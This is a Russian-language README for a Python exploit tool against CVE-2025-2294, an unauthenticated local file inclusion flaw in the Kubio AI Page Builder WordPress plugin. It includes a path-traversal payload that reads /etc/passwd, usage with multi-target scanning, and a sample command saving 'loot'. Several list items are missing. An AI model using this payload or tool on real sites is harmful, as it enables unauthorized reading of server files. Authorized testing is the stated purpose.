
Python скрипт эксплойта для CVE-2025-2294, неавторизованной уязвимости включения локальных файлов (Local File Inclusion) в WordPress Kubio AI Page Builder ≤ 2.5.1. Поддерживает сканирование одной/нескольких целей, пользовательские полезные нагрузки, прокси и предварительный просмотр ответа.
CVE-2025-2294 затрагивает плагин Kubio AI Page Builder для WordPress (версии до 2.5.1 включительно). Он содержит уязвимость Local File Inclusion (LFI) без аутентификации через функцию thekubio_hybrid_theme_load_template.
Эта уязвимость позволяет атакующему включать и выполнять произвольные файлы на уязвимом сервере WordPress, что может привести к:
| Поле | Значение |
|---|
| Тип уязвимости: | Локальное включение файлов (LFI) |
| Затронутый плагин: | Kubio AI Page Builder |
| Затронутые версии: | ≤ 2.5.1 |
| Вектор атаки: | Неаутентифицированный HTTP-запрос с подделанными параметрами |
| Эксплуатируемость: | Высокая |
| Оценка CVSS: | 9.8 (Критическая) [CNA: Wordfence] |
Этот скрипт на Python отправляет специально сформированные HTTP GET-запросы на уязвимый сайт WordPress, чтобы проверить, подвержен ли он проблеме LFI.
/etc/passwd).usage: cve_2025_2294.py [-h] [--url URL] [--payload PAYLOAD] [--save SAVE]
[--lines LINES] [--timeout TIMEOUT] [--proxy PROXY]
[--check] [--list LIST]
CVE-2025-2294 LFI Exploit
optional arguments:
-h, --help show this help message and exit
--url URL Target URL (e.g., http://127.0.0.1:8080)
--payload PAYLOAD
LFI payload path (default: ../../../../../../../../etc/passwd)
--save SAVE Save full response to file (optional)
--lines LINES Number of preview lines (default: 10)
--timeout TIMEOUT
Request timeout in seconds (default: 10)
--proxy PROXY Proxy URL (e.g., http://127.0.0.1:8080)
--check Check vulnerability status only, no saving or preview
--list LIST Path to file with list of URLs to check one by one
python3 cve_2025_2294.py --url "http://192.168.1.10" --save loot.txt --lines 20 --payload /etc/passwd --timeout 10 --proxy "http://127.0.0.1:8080"

Запрос/Ответ:

Этот инструмент предназначен только для авторизованного тестирования безопасности и исследовательских целей. Несанкционированное использование против систем без разрешения является незаконным и неэтичным.